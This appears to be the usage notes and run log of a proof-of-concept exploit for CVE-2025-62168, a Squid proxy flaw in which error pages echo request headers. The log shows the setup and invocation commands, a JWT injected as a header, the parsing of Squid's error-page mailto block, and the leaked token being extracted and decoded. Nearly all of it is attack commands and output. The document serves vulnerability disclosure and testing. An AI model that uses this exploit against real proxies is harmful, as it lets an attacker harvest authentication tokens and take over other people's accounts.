CVE-2025-62168 – CVE Helper

README.md
Rendering markdown...
POC / example.txt TXT
⬇ Raw GitHub ✕ Close
# active venv
cd ~/CVE-2025-62168
source .venv/bin/activate

# usage python cve-2025-py

usage: cve-2025-62168.py [-h] [--proxy PROXY] [--verbose]

PoC for CVE-2025-62168 — Squid Proxy token leak via error page header reflection.

options:
  -h, --help     show this help message and exit
  --proxy PROXY  Proxy URL (e.g. http://127.0.0.1:3128)
  --verbose      Enable technical debug output

Example:
  python3 cve-2025-62168.py --proxy http://127.0.0.1:3128 --verbose

[!] Missing required argument: --proxy

# exec python3 cve-2025-62168.py --proxy http://ip.server:port 

python3 cve-2025-62168.py --proxy http://127.0.0.1:3128

------------------------------------------------------------
 STEP 1 — Connecting to proxy...
------------------------------------------------------------
 Proxy: http://127.0.0.1:3128

------------------------------------------------------------
 STEP 2 — Sending request with injected token...
------------------------------------------------------------
 Injected Header: X-Test-Leak: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.ewo...

------------------------------------------------------------
 STEP 3 — Server responded, extracting error page...
------------------------------------------------------------

------------------------------------------------------------
 STEP 4 — Parsing mailto block from Squid error page...
------------------------------------------------------------
mailto:webmaster?subject=CacheErrorInfo%20-%20ERR_READ_ERROR&body=CacheHost%3A%20poc-linux%0D%0AErrPage%3A%20ERR_READ_ERROR%0D%0AErr%3A%20%5Bnone%5D%0D%0ATimeStamp%3A%20Tue,%2025%20Nov%202025%2014%3A32%3A29%20GMT%0D%0A%0D%0AClientIP%3A%20127.0.0.1%0D%0A%0D%0AHTTP%20Request%3A%0D%0AGET%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20krakhen.dev-cve-2025-62168-poc%0D%0AX-Test-Leak%3A%20eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.ewogICJzdWIiOiAiMTIzNDU2Nzg5MCIsCiAgIm5hbWUiOiAia3Jha2hlbi5kZXYiLAogICJhZG1pbiI6IHRydWUsCiAgImlhdCI6IDE1MTYyMzkwMjIKfQo.LspWRdaIXcXllUuABCsYXRqBoKseG5vlb_YIW259aiU%0D%0AAccept%3A%20*%2F*%0D%0AAccept-Encoding%3A%20gzip,%20deflate%0D%0AHost%3A%20nonexistent.krakhen-test.local%0D%0A%0D%0A%0D%0A

------------------------------------------------------------
 STEP 5 — TOKEN LEAK CONFIRMED
------------------------------------------------------------
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.ewogICJzdWIiOiAiMTIzNDU2Nzg5MCIsCiAgIm5hbWUiOiAia3Jha2hlbi5kZXYiLAogICJhZG1pbiI6IHRydWUsCiAgImlhdCI6IDE1MTYyMzkwMjIKfQo.LspWRdaIXcXllUuABCsYXRqBoKseG5vlb_YIW259aiU

------------------------------------------------------------
 STEP 6 — Decoding JWT token...
------------------------------------------------------------
Header:
{
    "alg": "HS256",
    "typ": "JWT"
}

Payload:
{
    "sub": "1234567890",
    "name": "krakhen.dev",
    "admin": true,
    "iat": 1516239022
}

Signature:
LspWRdaIXcXllUuABCsYXRqBoKseG5vlb_YIW259aiU


------------------------------------------------------------
 DONE — PoC completed successfully.
------------------------------------------------------------